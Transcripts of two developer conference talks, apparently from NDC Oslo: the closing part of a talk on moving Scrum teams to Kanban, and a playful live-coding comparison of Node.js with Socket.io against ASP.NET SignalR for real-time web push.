And then you start working with the team to figure out what it would take to do these things. Then there needs to be a bit of analysis to understand what the impact is, where the piece of work will have to be done in the banking system, so you're doing some of that sort of analysis work, and so then what you're doing in this team is really discussing what the flow of items is, and this team, so I mentioned about estimating, this team do choose to do estimating, they say, well, we want to do some t-shirt sizing just so we can decide, like if something is too big, we might need to actually have some meetings to break it down. They also started, I don't know if you can quite see, but at the bottom here, they start having some definitions of done around the columns, but not a definition of done at the very end, but is this ready for us to move forward to the next? And then there are some little buffers starting to appear. Now, this is just what it looks like, it's a sketch, it's what they think they might do, it's a future sketch, it's an illustration, it's not a precise process definition, but it helps to have that conversation and start talking about what the process is, what states the work goes through, and where it waits around. But practically, the team is only going to know how this system works when they start operating it. So this initial thing, get the sketch done, then try it out. So step two, the team, now based on their whiteboard sketch, have started to make a board design. They have some names at the tops of the columns, they haven't put their WIP limits on yet, and that's partly because they want to get used to this new way of working. But notice that they have really tried to make it easy to read, make it clean and tidy, they've got super sticky post-it notes that won't fall off, they have, you can't quite see it, but they have some magnets that they have bought to represent team members, they haven't put those on yet, and they've started, those definitions of done that they had, they printed them out and they put them at the bottom of the columns. Now, this is a board just representing where our work is at the moment, then they start using it. And in Kanban, you typically do have a daily stand-up meeting, but what you do in your daily stand-up meeting is you are looking to see, is the board representing the work at the moment? Are there blockers that are not being dealt with? Do we have any bottlenecks? Is anybody kind of blocked or too busy? And you're typically, and this is different from a Scrum stand-up meeting, you tend to focus from the, I'm just trying to think of how this looks to you, from the done column end first, you're looking back to say, pull the items this way, you're not stuffing more things in, so it's a pull system. So, typically, when you're looking at the work, you're not looking at what's the next thing that we should work on, you're more normally thinking what's blocked that needs to be moved forward. And you tend to run this meeting looking at, talking about, the work, not person by person. So, it's not driving out this kind of commitment, you know, what did you do today? It's much more saying, where is this piece of work? And if you're not working on any of those things on the board, then you might not actually say anything. So, you're really trying to shift this into, does the board represent what we're doing, and does the board tell us that we need to do something different?
Now, as you start doing that for a while, you can start to get a sense of what would be sensible WIP limits for us to try. Again, these are our initial WIP limits, we may need to reflect and add more columns, we may need to change our WIP limits. But I think I'd be right in saying that David Anderson normally recommends starting with high WIP limits and then gradually tightening them. So, if you've just got a WIP limit of one thing per person and then one thing gets blocked, you're running into being blocked quite soon, so you might want to have slightly more relaxed limits to allow people to have something to do. So, now, this is the team after they've been going for a few weeks, and if you look, you can see that there's too much stuff on the board, and they haven't really been following the WIP limits. So, this is a team that's still learning, and what you're trying to do with the WIP limits is to become more aware of when you exceed them. The way that they've designed their board makes it quite easy for you to put another post-it note in, because, so you can see how many post-it notes are crammed into the prioritised backlog column, there's too many things there. One technique that I've seen teams use is to actually design your board so there are literally only spaces for the amount of tickets that you're allowed to have, and then put a kind of a cross thing so that you can't, you're very conscious, oh no, look, we're going past our limit. So, you may want to think about that, but more crucially, what this prompts is we need to reflect on what's going on. So, this is a picture from a retrospective, and it is a picture of a cake that is shaped like a bug, and it has a number on it, which is 1133. This bug took many weeks for the team to sort out, and somebody in the team made a cake like the bug, and they ate the bug, but they also used it as a way to celebrate, we've killed that bug, but how did it really happen? Why did it take us in this direction? Why was this so difficult for us to fix? A lot of that came down to not having the knowledge in the team, and they needed to expand their understanding of the other systems. This was something that was very difficult to replicate, that was happening in one of the databases, and it was difficult enough to replicate, and really, really difficult to figure out what was going on. But it was worth having a retrospective literally just about that thing. And what you want the team to do is to become more responsive to noticing what's happening, what's slowing them down, and thinking, how do we make sure that doesn't happen again? So, yes? Yes? So, it just hasn't been my experience that that's happened, but I can imagine it might happen, and if that is happening, it might be an indication there's too much stuff going on. If you're finding that the meeting is kind of getting bloated, that's possibly too many things to discuss, we probably are trying to do too many things at once. So, my reaction would be maybe to kind of do less, have fewer blockers, and then have a smaller focus. Now, a question that a lot of people worry about when they're moving towards this approach is they worry about where do all our meetings go. So, I mentioned retrospectives. Now, normally in Scrum, we have those at the end of the sprint, and, you know, you have your release, or you should have your release, at the end of the sprint. And so, in Scrum, the meetings are pinned to the time box, and the release is pinned to the time box.
And what you're trying to figure out when you move to a Kanban approach is really, what's the real frequency that in your organisation, how often does it make sense to get stakeholders together, how much does it make sense to get the team together, do you need to have some meetings or some events that are triggered by hitting a limit. So, there are, when people move to use, when teams move to using Kanban, they're not throwing everything away. It's just they're starting to realise that they don't all have to be kind of bolted to this cycle, that you can have different frequencies for different things. So it's not that, you know, retrospectives disappear or go away. Now, I'm getting towards the end of the time, and I want to now take the other point of view and kind of say, well, okay, so what are the good things in Scrum that we might lose and, you know, what would we want to be careful about? So, you don't want to throw the baby out with the bathwater. I don't know if you have that saying in Norway, what are we doing in the UK. So, I have come across teams that have been trying to use Kanban, and things are not good. And I have actually been in environments where we have gone back to using Scrum. Now, the kinds of things that were happening for that to be a thing that we decided to do was, and this is with a particular organisation, they were making a news portal, and they had, they'd just been making features as people suggested them. They had lots of features. It had kind of got into this business as usual mode, you know, somebody comes up with an idea, you just build it and release it. And it felt as if the team really didn't know where they were going or what they were working towards. They were, it just seemed like anyone could ask for anything. And so, there was this, and this is something that can happen to Scrum teams as well. It's like you just, you can't see the view outside the sprint. You can't see the big picture. You can't see the roadmap or the where are we going view. And if you can't see that, then it can feel demotivating. It can feel like, you know, I made, you couldn't, and I've experienced this on XP teams as well, is that we just release features and we release features and we're an effective team, but it feels like there's nothing big to celebrate. We're just doing lots of small releases of stuff, and we don't really know where we're going. And you can lose this sense of what is the product we're making or what's the big release plan, you know, where's our product going. So, sometimes, and especially if teams, and I've seen this where a whole bunch of people have joined an organisation and they've just kind of gone along with what's happening. So, there's a big Kanban board and they have a stand-up meeting and then they kind of go away and they don't really know what anybody else is doing. There has been a lack of the meeting coherence because if you think about it, one of the things that Scrum does is it gives, it helps the team establish a goal which binds the team together. If you have a big mass of people and it's not very clear what the goal is, you can end up with factions and with people not getting on as a team. So, that's something to watch out for really is that people are starting to just feel like a cog in a big machine and they're not really feeling accountability, they're losing, it's that big team effect that you end up having. So, I don't know, does anyone recognise what I'm talking about this kind of effect? 
So, what I've found is actually it can be helpful to get back to basics sometimes. Sometimes it does help to say, right, this is a product we're working on, this is the small team who are working on it, we're going to work very closely with the product owner, we're going to have sprints. But the key thing is, if you can do Scrum, treat the product increments as serious product increments and not get into this Scrummerfall situation where it becomes this long waterfall-with-Scrum-in-the-middle kind of situation. And I think sometimes when people are new to this, you get people who are joining an organisation and maybe they said, oh yeah, I did Scrum in my last organisation, but maybe they didn't really. And you can get people who are kind of passengers with the process and they don't really feel engaged with it, and sometimes it helps to just bring it back to a much simpler, more rule-based thing while people are learning. And then once they start to understand how things work, then increase the flexibility for changing stuff and move more towards a Kanban way of doing things. Now, I think I'm slightly early in the timings, I think maybe we've got five minutes left for questions, so have you got any questions? Any questions? Yes. Yes. So you can, well, one way that I've seen people do it, they have a ticket which represents the user story and then they have a little tail of tickets which represent the tasks, but they are small, you know, they use mini post-it notes to have a few tasks. You have to really ask yourself why you are doing that, and you wouldn't necessarily do, as you do with sprint planning, a session where you say, let's work out all the tasks for the sprint. You're much more, oh, we're about to start this item, let's figure out the tasks, because then we can work out how to share that work out across the team. So you might have that as a triggered thing that you do as you take a ticket into starting to work on it, and obviously you wouldn't do tasks for the ones that are small and kind of obvious. Does that make sense? Yes. Yes. Yes. And actually a classic thing people don't show, for instance, is testing tasks. So people kind of go, here's the development task, and then we have a column for testing and we don't actually then unpack to say what the testing tasks are. So it very much comes down to the skills of the team, and you have to think about, when you're creating tickets, what are you really trying to represent, what communication does that facilitate. Now, all I would say is that Kanban leaves it open, as this is a toolset that you're using. So it's up to you whether it's useful for you to have a triggered event, like every time we take a new ticket we do that unpacking into tasks, or do we say use the tasks to represent the workflow so we have columns for them. But basically Kanban is much lighter and has less process than Scrum. And Scrum is pretty light. So it's even less. So one of the things that Kanban doesn't have, for example, is roles, and it doesn't have any prescribed events. All it's saying is make things visible and limit the work in progress and then reflect on what you see. Try to look to improve your cycle times. And that then leaves it open to try all sorts of different experiments to try and improve your cycle times. Any other questions? Oh, sorry.
The question was, and I might not word this question exactly now because it's been a few moments, but it was if you, so you were saying that there are user stories and sometimes the different sizes and sometimes you might want to do a task breakdown. So would you do that in Kanban or not? And you could if you wanted to, but you might not. And I think the other part was that sometimes some of these tasks when you break down an item are actually items in work, they're kind of activities in your workflow. So it might be that you don't have a task representing it because you now have a column representing it. So I don't know, was that a fair representation of your question? Okay. Any other questions? Yes. So I think it very much depends on how you establish them at this cadence of meetings. You clearly want this to be, you have some business people involved, but at the same time you want don't want everybody at all of those stand-up meetings necessarily, you may want key representative, key representatives, you might do something a bit like the product owner kind of pattern in Scrum, but you might not. One of the things you might decide to do is to have, you know, showcase events where you have everybody in the department goes to see those. So there's a bigger showcase. You might have a smaller group responsible for prioritization and it may be that two or three of those people are really sitting with the team actively being part of that system. I think anywhere where you have separation, where you have the people apart from the people, you know, so if what you don't really want is for the columns on the Kanban board to be like departments who don't, you know, who only talk through tickets. So, and then I'm just really remembering that I didn't repeat your question. So your question for the people who may not have known is what, how do you involve the business side in Kanban? Any other questions? Yes. How do you assure that the items have the same size? So you can't and it's through the team kind of going, and yes, you could imagine you've got some item. So the question is how can you assure that the items are the same size? If you get a very big item, it's going to block the pipeline up and it's going to have a long cycle time. It might be that that's a useful thing to release. And so you don't necessarily have to have things that are all the same. But it's just that if you are trying to make predictions about things based on your average cycle time, it helps to have things that are more or less the same size. But you don't, you're not trying to force things to be the same size. Yes. Well so if you had, just imagine, you had a very big item, it would just be in process for much longer. It's not, you're not exceeding your limit by putting a big thing in. It just slows things down. So it's just, that's going to start, people are going, you want to encourage people to reflect on that. It can vary. And it typically does vary. It's just that you don't want it to be very great. Yeah, you would want, in an ideal world, you're trying to break down the items to sort of similar size-ish things. But it may be that if you are really trying to release, you've come up with a minimal marketable feature that you think, right, this is the thing that we want to put live, it may make sense to do a bigger blob of work. There was, now I'm just thinking, my time is probably up. I don't know who was going to remind me about 10 minutes. Did you remind me about 10 minutes? I didn't see you. 
So I guess if there's any other questions then please come and see me afterwards. But otherwise, thank you.
|
Many teams who are already using Scrum would like to know what benefits they can get by moving to Kanban. Dropping the Sprint timebox can seem quite scary, but on the other hand spending less time planning and estimating seems attractive to many developers. How do you know that you haven't thrown the baby out with the bathwater? Come to this talk to hear about what Kanban can bring to your team and what practical steps you can take to get started and keep going through the rough patches. We also take a look at potential pitfalls with Kanban and situations where you might want to move back to vanilla Scrum. I'll illustrate this talk with some stories from teams I've been coaching at the BBC and Deutsche Bank.
|
10.5446/50987 (DOI)
|
Oh, good. Yes? Hello. Are we ready to start? We are ready to start. Hello, it is the cage match. We have Rob Conery. Yes. Happy with the heart of gold. Coming in from Hawaii, he's here to show us Node.js and some smiles. And we have Damian over here. And Damian is Mr. SignalR. He is sort of mute. He lost his voice. We're not going to let that hold us back. We have some thoughts about that. And so we know you guys don't ask questions here in Norway, but we want you to make an exception and ask some questions, and we're going to have some fun for the next hour. And we're going to be talking about... It's not working. Oh, it's not working. This is an unfair match for you, isn't it? It's not going to happen? No. I will be speaking for Damian. I can do that all day. I can just talk on yours, I guess. Yeah, you probably can. It's a Mac. It's got a repellent field. Oh, right, right, right. All right. Let's get going. We're going to be talking about Node.js and SignalR. So first of all, I want to see what you guys are going to be working with. So Rob, let's show us, when you do some Node.js, what are you going to develop with? Well, there's a number of choices that you have when you're working with Node. Sorry. No hitting below the belt, no excessive things. My preference is to just work with the console as you see. You're asking for it, man. I've got tricks. Yeah, so working with the console, as you see, is my typical favorite thing to do. And then I also like to use Sublime Text 2. And it's right here. That's one of my favorite editors. I also like to work with Vim. I should also say, if Hadi is here, that WebStorm is a great IDE that you can use. I tried to learn how to use it yesterday. I just didn't have enough time. I wanted to show it today, but it's got a debugger and all the stuff that you're probably used to in other IDEs. So that's what I use. All right, Damian, what do you got? A very bad voice. I have Windows 8 RC. I'm using Visual Studio 2012 RC. This voice is terrible. And I also have a command line. Mine's a little bit different to yours. I've got PowerShell running in Console2. And other than that, that's basically my tools. I'll use NuGet for package management, which we'll probably look at soon. All right, let's just jump right in and start with Hello World. Rob, can you, sure, print something out? Wow, that was terrible. Okay, so I've already kind of started things off a little bit because I don't want to go through all of the installations. To use anything with Node, you use a thing called npm, the Node Package Manager. And it'll download and install the modules into your projects. So right here I have a directory called cagematch. Inside there I have node_modules. Inside there I have a thing called Express. Express is going to give me a website. So to run it, just so you can see that I'm running it, you just type in node and then app.js. It's going to run app.js, which is right here. So I'll hit go and up comes the server. And then let's go to a new tab, localhost, not love shack Norway. That was a great, great video yesterday. Anyway, so here it is. It just pops up. There's our, there is Express. To install Socket.io, I'm going to use the same thing, same cage manager. I have a cage manager. Yeah, the cage manager. I'm the cage manager. Yeah, package manager. What is a cage manager? You don't answer that question. You do not answer that question. You were in the Navy in San Diego, boy. I don't want to know about that. So npm install and socket, socket.io.
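For anyone following along at home, the app being started here with "node app.js" is roughly the shape below. The exact generated code isn't shown in the talk, so treat this as a minimal, hedged sketch of an Express hello-world rather than the actual app.js; the Socket.io wiring described next is sketched separately after that.

```javascript
// app.js - a minimal approximation of the Express app being run with
// "node app.js"; not the speaker's exact code.
var express = require('express');
var app = express();

app.get('/', function (req, res) {
  res.send('Hello from Express');
});

app.listen(3000);
console.log('Listening on http://localhost:3000');
```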
And so what it's going to do is it's going to go up to the registry, npmjs.org, grab Socket.io, and download and install it. Thank goodness for the internet. It works here. Hooray for NDC. And so inside here I now have a new module, Socket.io. It's in there. One of the cool things about the way Node works is when you install a package, it usually comes with examples and tests, the source code and everything. So if you want to know how it works, you can just come on in here and take a look at a chat app and see how it's wired up. All right, so in the interest of time, I'm going to scream on ahead to wire up Socket.io. Let's see, we need to do var io equals require. And this is the way you invoke a module. You just say require socket.io. And then you just have to tell it to listen to your app. And by the way, is Guillermo here? Anywhere? Then you can say whatever you want. Thank God. Yeah, so I found out just three days ago that the guy who actually wrote Socket.io is here at the conference. Yeah, so that's not terrifying at all. Step back a second. What's a socket? Why do we care? What's a socket? We're doing web stuff. So the idea behind Socket.io is it's real time, it's live, it's a live connection. But what does that even mean? There's a number of ways that you can get your browser to lock onto your server and have this kind of live back and forth, this pull and this push. So Socket.io actually works with a technology called WebSockets. WebSockets is rather new and a lot of hosters and browsers and whatnot, like IE9 and 10, right? I mean, a lot of other hosters, they don't support it. So what Socket.io does is kind of abstract that all away. So if you have WebSockets, you'll lock on and have a new socket session with your server. If your browser doesn't, then Socket.io will abstract that down to what they call Ajax long polling, forever frames, blah, blah, blah, blah. So it goes all the way down to browsers IE 5.5 plus. So this thing works with way old browsers and abstracts it away. So it keeps you with this virtual notion of a persistent connection with your server and eventing. Okay, you should be explaining this, not me, Mr. Boyce. I can't talk. So now I've got completely distracted. So one thing I do want to show is this is the socket.io website. It's just at socket.io. You can come over here and take a look at how to set up a server. And then you can just, like what I just did is I'm using Express. So if we come down here and, well, the Express directions are somewhere down here. But anyway, what you can do is just take the code. Do you notice how I just skated right over that, that I forgot how to do the code. On connect we can say socket.send, hello from server. So we have that. So I'm telling the sockets, when a connection comes in from the browser, send back a message. Sockets.send. And then if I go into views, index.jade, and script source equals... Well, Rob's typing. I'm just going to say Jade is awesome if you haven't used it. Just with. That's not fair because I've had to talk. Damian, were you writing a letter home to mother? Well, what's going on over here? So while you were busy. Yeah, you go ahead. You do it when I'm doing my demo. Doing whatever it is you do. I wrote a hello world app in SignalR. That's not fair. So it's just not fair. I used NuGet, people obviously watched. I hope they weren't too mesmerized by Rob's sort of surfer-chic look. I downloaded SignalR from NuGet. I started an empty ASP.NET application.
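Here is a rough sketch of the Socket.io wiring being described, not the code typed on stage. In the Express of that era the app object was itself an HTTP server, so io.listen(app) worked directly; with later Express versions you attach Socket.io to an explicit HTTP server as below. The timestamp push anticipates what gets added a few minutes later in the demo.

```javascript
// Sketch only - approximates the server-side wiring described in the talk.
var express = require('express');
var http = require('http');

var app = express();
var server = http.createServer(app);
var io = require('socket.io').listen(server); // attach Socket.io to the server

io.sockets.on('connection', function (socket) {
  // push a message to the browser as soon as it connects
  socket.send('hello from server');

  // keep pushing a timestamp every second (the "one-up" shown shortly after);
  // JSON.stringify(new Date()) is what gives the "JSON timestamp" look
  var timer = setInterval(function () {
    socket.send(JSON.stringify(new Date()));
  }, 1000);

  socket.on('disconnect', function () {
    clearInterval(timer);
  });
});

app.get('/', function (req, res) {
  res.sendfile(__dirname + '/views/index.html'); // a plain page stands in for the Jade view here
});

server.listen(3000);
```

On the client side the page just needs a script tag pointing at /socket.io/socket.io.js, an io.connect() call, and a socket.on('message', ...) handler to display whatever the server sends.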
I haven't actually used any ASP.NET sort of -isms so far. It's just an HTML page. So I got jQuery, I got SignalR from NuGet. I created a hub. I'm sorry. What? You guys, do I hear that or here? Nice. What was I doing? All you have is cheap pony tricks. Rob, this is going to be a very fun session. So I created a hub, which is kind of the unit of connection for SignalR in our high-level API. This is the thing that the clients connect to. In this case, I didn't need the clients to call anything on the hub. So there are no public methods. I just needed to be able to broadcast to the clients. So it's just an empty class that derives from Hub. And then I just sort of did what you sort of never do in a web application, which is in AppStart I fired up a thread, and then in a while-true loop I just broadcast to that hub. I'm sleeping for a second in between. So I have a background thread running in my application, which is broadcasting hello world and the current UTC now date to the clients, because we never use DateTime.Now in a web application, do we? So you're broadcasting, so you're sending down to the connected client, they're going to keep getting information back from the server. Yeah, correct. So I mean, I can just sort of prove the point by opening up a browser. Rob, look into something like that while Damian's talking. Me? Go on. Damian? Oh, what's that? Sorry. Are you done? I'm done. So that's hello world in SignalR. Done. So Rob did mention something about Socket.io being an abstraction over WebSockets if it's not there. So that's exactly what's happening here as well. We can see if we look at Chrome on the left-hand side, this connection down here where it says connect to SignalR, if we look at the request, and I zoom in here, you'll see that it says the transport is server-sent events, which is a transport mechanism that all browsers other than IE support. It's kind of an old-ish streaming web standard that never really caught on, but it's kind of useful for doing server push if the browser supports it. So SignalR will use that if it's there. Whereas IE, which doesn't support that, if we look at its network stack and figure out what it's using, so I'll just F5 here, and we can start capturing and do that again. Then we'll see down here that the transport in this case is something called Forever Frame, which is another old technique. It's been around for a while now for pushing data from the server to the client over an open HTTP connection. So we've negotiated the appropriate transport based on what browser we're using. Now I'm using the version of SignalR from NuGet, which is 0.5, which doesn't include our WebSocket support, but the version in source, which we'll very soon release as 0.5.1, does indeed support WebSockets if you're running on Windows 8 with IIS Express 8 or IIS 8. So the difference, I'm guessing, is WebSockets is probably going to be faster and better, but the fallbacks are going to work. They're just not going to perform as well. Right. We'll lose some features. Yeah, not really. Well, WebSockets will do binary, but SignalR doesn't do binary. We haven't really had a need for it yet. WebSockets are so new anyway that there aren't a lot of use cases for it just yet. The truth is once you have an open connection, when you're doing server to client, even an open HTTP connection is essentially just a socket. So when you're pushing stuff over it, it really shouldn't be any slower than what a socket would be.
The same isn't true for going from client to server, because when you go client to server, you're just doing an AJAX post. So obviously there's a lot of overhead involved with that. But if your application is just doing, like, a normal user application where you're doing a post every second or so, you're not going to notice the difference. The only time you'll really start noticing a difference, when you want to use sockets, is for stuff that's truly real time, like gaming, where you really need to have that full-duplex bi-directional stuff. Gotcha. So Rob, Damian earlier, you know, one-upped the hello world and he started pushing down timestamps every little bit. I'm trying to do that and I'm getting blocked. For some reason I was thinking, setTimeout. Oh, setTimeout. So this is one thing about Node that you should know, is that if you do anything with the server and you change your code files, straight away you're going to have to restart it. You can use something that, when you change a file, bumps the server and restarts it for you, but it is a little bit annoying. So if I restart this, wait for a second. There we go. That's my HTML skills right there. Let's fix that, shall we? There we go. Much better. There we go. And that's supposed to be a timestamp, but it's a JSON timestamp. Everyone reads JSON time by now, right? Questions yet? Any questions? There's got to be some questions. Come on. No? Okay, let's talk about... I mean, I'd like to see a real app. I'm wondering if we need to do anything more before we go on. We've got Hello World, which is nice, but I'm wondering about tracking something. Some user interaction of some sort, maybe. Yeah, exactly. How about we add a button that the user can click, and when they click it, something happens in the other browser? Sounds good. That's like a step above, rather than let's sit for half an hour and watch this type. Yeah, sure. Okay. Alright. Somebody want to talk first while you go? You go first. Okay, so I'm going to go back to my hub and I'm going to add a method that the client side, in this case the browser, can invoke when this button gets clicked. So this could be a void-returning method, which is what it's going to be now, because I'm just going to sort of send a fire-and-forget, or it could actually return something. Actually, let's do that just to prove it. So I'll just return a string from this method and I'll say do stuff. And again, that could take arguments as well. Be they primitives or complex arguments, we'll try and just deserialize those from JSON into the object using JSON.NET. So as long as we can use JSON.NET to shove it into the type, we'll do our best to do that. So let's, we'll take a message. What the hell? And so then once I have that message, I'm going to have to send that out to all the clients. So I'm going to use the Clients dynamic property on the hub, which lets me invoke client-side methods on the client-side hub. So our hub technology has got a server-client pair. We have a hub on the server and then we have a client hub, which is able to invoke methods on the server. And the server hub is able to invoke methods on the client hub. So I'm going to invoke Clients.person... That hub is like a proxy then? It's kind of a combination of a proxy and an endpoint. Yeah, because it's a proxy in the sense that the client can call the server through it, but then it's an endpoint in that the server can call the client. So it's kind of a reverse proxy as well. Okay, and this has to return something as well.
So we'll return a message. So now I'm going to come back to my UI and we'll add a button up here. So we'll say button ID equals do stuff. Do you need runat equals server there? No, but thank you for your insightful... It's missing view state. Yeah, it is. I chose not to use web forms today. I am the web forms program manager as well as... Oh, I know. Yeah. So you could maybe have a hub that increments view state as you go. Just keeps growing and growing. So don't laugh. No, see, they just did. In a future version of SignalR we will have, I've already got a prototype of, who's ever used an update panel? Come on, be honest. Ha, suck it. So we all know that there's this concept. Who's enjoyed using an update panel? Yeah, it gets the job done. Who hates the drag and drop? It's everything after that. So I do actually have a prototype of a control you can drop in an update panel that will invoke a server-side-initiated refresh of that update panel using SignalR, so that you could have the update panel refresh itself automatically when something on the server happens. Which is kind of cool if you've just got an existing app and you want to sort of add some real-time update to it. Okay, we love web forms programmers. They're programmers too. So we want to do something. So now I'm going to come down here, and after the start method is called, this is an interesting point. A common mistake people often make is they call start on the hub connection and they go ahead and start wiring up their client UI. And that's kind of bad. So I'll wire up the client UI and then I'll show you why. So let's find that button. So that was called do stuff. And when that's clicked, I want to go ahead and on my hub I'm going to call, anyone remember what I called it? Do stuff. I should have known that. And I'm going to pass in something from the client. Okay. And that's going to return, ooh, that's going to return a value just so we can see that. Return value. Okay. And I'll add that into here just so that we can prove it. So I'm just going to call that same method because I'm lazy and pass in the value so we can see that it's actually getting that back from the server. Okay. So the problem with doing this is that start is asynchronous. Start is going to make an Ajax call, and so what will happen is the start call will happen and then you'll wire up your click UI. And if someone happens to click the button before the connection is actually fully started, you'll get an error in the JavaScript, because you can't send stuff over the connection before it's actually established. So what you have to do is, start returns a deferred promise, a jQuery promise. So then you can chain that with a dot done and then pass in a function to that, which will get executed when the connection is actually finished starting, like so. Don't we love async programming, awesome stuff. So let me recompile that and see if this works. F5, F5. So now when I click it, okay, so I got an object that's really useful. [object Object]. That's awesome. Let me go back. Let's do some debugging. This is a good segue into what would I do to debug this. So obviously what's coming back from the server isn't a string, which is what I thought it would be. So let's come into my script, which is this page here. This is the value I'm interested in. Start debugging. That's going to pop that out. Click that. I'm going to step over that now and my value is a value which contains a whole... it's a promise. Oh, I forgot.
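The hub itself is C# on the server, but the JavaScript side being wired up here looks roughly like the sketch below, written against the SignalR 0.5-era jQuery client. The hub proxy name (personHub) is an assumption, as the class name isn't said out loud; the page is assumed to reference jQuery, the jquery.signalR script and the generated /signalr/hubs proxy.

```javascript
// Sketch of the client-side wiring being described; not the exact demo code.
// Assumes <script> references to jQuery, jquery.signalR-0.5.js and /signalr/hubs.
$(function () {
  var hub = $.connection.personHub;      // generated proxy for the server hub (name assumed)

  // client-side callback the server broadcasts to via Clients.personDidStuff(...)
  hub.personDidStuff = function (message) {
    $('#messages').append('<li>' + message + '</li>');
  };

  // only wire up the UI once the connection has actually finished starting
  $.connection.hub.start().done(function () {
    $('#doStuff').click(function () {
      // invoking a server method is itself asynchronous and returns a promise
      hub.doStuff('this is the client speaking').done(function (value) {
        hub.personDidStuff(value);       // show the server's return value locally (the echo)
      });
    });
  });
});
```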
So when you invoke a server method, it itself is asynchronous. Of course. So you can't just get a return value from it. It's like an Ajax call. So what you have to do is rather than just assign the value to that, once again, you can send a call to the server. Once again, you can say dot done and treat this like an Ajax call like you would in Ajax, or you can pass a callback as a second parameter and we'll pass in the value into that callback. So I'll use dot done again because I like dot done. We'll do function. So the value is going to go into the function. And then once that's finished, we will pass. There it is. So now you can see where the wonderful world of asynchronous programming really comes to light. We have this beautiful nested call hierarchy. F5. Okay. Awesome. There we go. So there's my message. Hey, hey, hey. You can see that coming in now on both sides. Oh, I'm sorry. You are an old man, aren't you? You had that one, Stahls. Ready to go to mute. No, you just walked into it. Sorry, did I interrupt you? No, no, no, I'm done. Oh, cool. And you? Yes. Awesome. I didn't use the hub that Damian did. In fact, I didn't even explain the client code. So let's step through that real fast. I'm using jQuery, same as Damian, and I'm trying to do the same exact JavaScript that Damian is. And I think this is actually an important point aside from the Socket.io stuff. Aside from Socket.mit, et cetera, I mean, the client side code is actually fairly trivial. You're just triggering events, responding to events. And if you do any client side coding with Backbone or anything, then hopefully your mind juices are starting to flow. Like, wow, I can listen to a model and then I can fire something on the server and data gets sent over. So what I originally had done is just listen to the connect event from the server saying onConnection, da, da, da. So to avoid what Damian was talking about, about an asynchronous crash, you'd want to wait for the socket on connection to actually be able to do anything. So you might want to have a flag in here before you emit this event. So what I did here is with the client library that I hooked up, because Socket.io gives you a client library. Using the client library, I just emitted an event. And I just said client calling. And then I said this is the client calling, of course. And then I was able to also pass a function from my client up to this server. So the server could invoke that function back on the client. Sounds kind of wacky, but that's what happened. And so I'm just updating my status right here. And on the server, I simply told the socket to listen when the client's calling. I'm going to be receiving some data and a function. I can take that data and do whatever I want with it. And then I'm just invoking the function right here. Hello, client. This is server. A little bit of round-tip craziness, but it's how it works. Now, to pick up on Damian's point about hubs, which I think are very important, I had to chain events, which is kind of mind-bending a little bit. I had to call socket emit and then socket on as a listener on the server, socket emit on the client. With a hub, it makes it a little bit easier because you can just invoke an event. That gets abstracted. You just say, well, I'm going to invoke something on the server. And so for that, I didn't have time to put together a demo and I apologize for that. But let's see, we have nowJS somewhere. NowJS, nowJS, nowJS, right there. So nowJS allows you to do sort of the same thing. 
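The emit-plus-callback round trip Rob just described, sketched out with Socket.io 0.9-era APIs (the event name, the reply string, and the #status selector follow his demo; everything else is a minimal assumption):

    // Client: emit an event with some data plus a function the server can call back
    var socket = io.connect();
    socket.emit('client calling', { msg: 'this is the client calling' }, function (reply) {
        $('#status').text(reply); // e.g. "Hello, client. This is server."
    });

    // Server: listen for the event, use the data, then acknowledge through the callback
    io.sockets.on('connection', function (socket) {
        socket.on('client calling', function (data, fn) {
            console.log(data.msg);
            fn('Hello, client. This is server.');
        });
    });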
And it works, doesn't work with SignalR, too? Does nowJS work with SignalR? You guys have hubs built in? We have hubs built in. So full disclosure, we got a lot of our inspiration from nowJS and socket.io. So that's why it looks very similar. Yeah. So yeah, the only thing I missed was that people might have seen me fix while Rob was talking is I wired up that extra. So I was calling person did stuff, but I hadn't added that function on the client side. So when I click the button, you'll know what I get is when I click the button, I get an echo back to the client that clicked it of the hey hey, because that's what the server's returning to the person who clicked it. And then a broadcast, this is the client speaking. So on the left-hand side, as I click, you'll see hey hey is appearing, but it's not appearing on the right-hand side. Because one's an echo and one's a broadcast. Oh, right. I didn't do the multi-browser stuff. So let's do the multi-browser. Well, first, before we get into multi-browser, Damian, maybe you want to start looking at multi-browser, like sending to more than one browser, you know, multi. But... I know exactly what you mean, John. Did you get much sleep last night? I actually did. I'm all completely on Norway time ready to fly back tomorrow. So wait, multi is in... Mold than one? More than one. Like what I have here? Pick a number like 400. Okay. Sending different things to different browsers. Can we do that? Okay. I have a question for you. Damian was going through and doing some stuff with debugging. Yep. How do you debug Node.js? Response is not right. Alert. Yes. You do alert because it's JavaScript. When you do alert on the server... Alert on the server, it pops up a message by all the parts to the mult... So all the parts to the mult. And that's the demo that's going to do right now. No, there's a couple of ways of doing it. I'm going to show you the hard way first. So if I want to debug, which everybody does, you can do nbm install node inspector. And thank you to Rob Ashton for showing me this yesterday. And so this is simply going to drop in a module. And let's take a look at that. Node inspector is now here. My Node module has been... By the way, I just want to explain to you, notice that modules contain modules. And if I pop this open, there could be more modules in there. That's one of the... Yeah, there's one. That's one of the weird and fun and fantastic things about Node that make it really fun to work with. In the Rails world, I'm sure anybody who's worked with Rails or Ruby, Gem collisions and craziness, trying to figure out versions of stuff, even.NET with GAC stuff. I didn't mean that while I'm sorry. Watch. So anyway, it's really a handy thing. So what we can do is, let's see, go into Node inspector and actually, I am going to go to GitHub to the Node inspector. Right. So you're going to run your app in debug, which is Node debug. And then app.js. And so now I'm running a debug mode. Nothing crazy about that. But then I'm going to go to a different browser here. Or a different... Yep, that's what I want. And then you can simply put in Node inspector, this command right here, just invoke it in the same directory. Was that you? Maybe Damian had something playing really quietly, just to nerve you a little bit. I'm sure. So now I've got two processes running. I've got my app running in one window, this one, and I've got a Node inspector running in the other. And it's actually kicked up a brand new thing for us to see. 
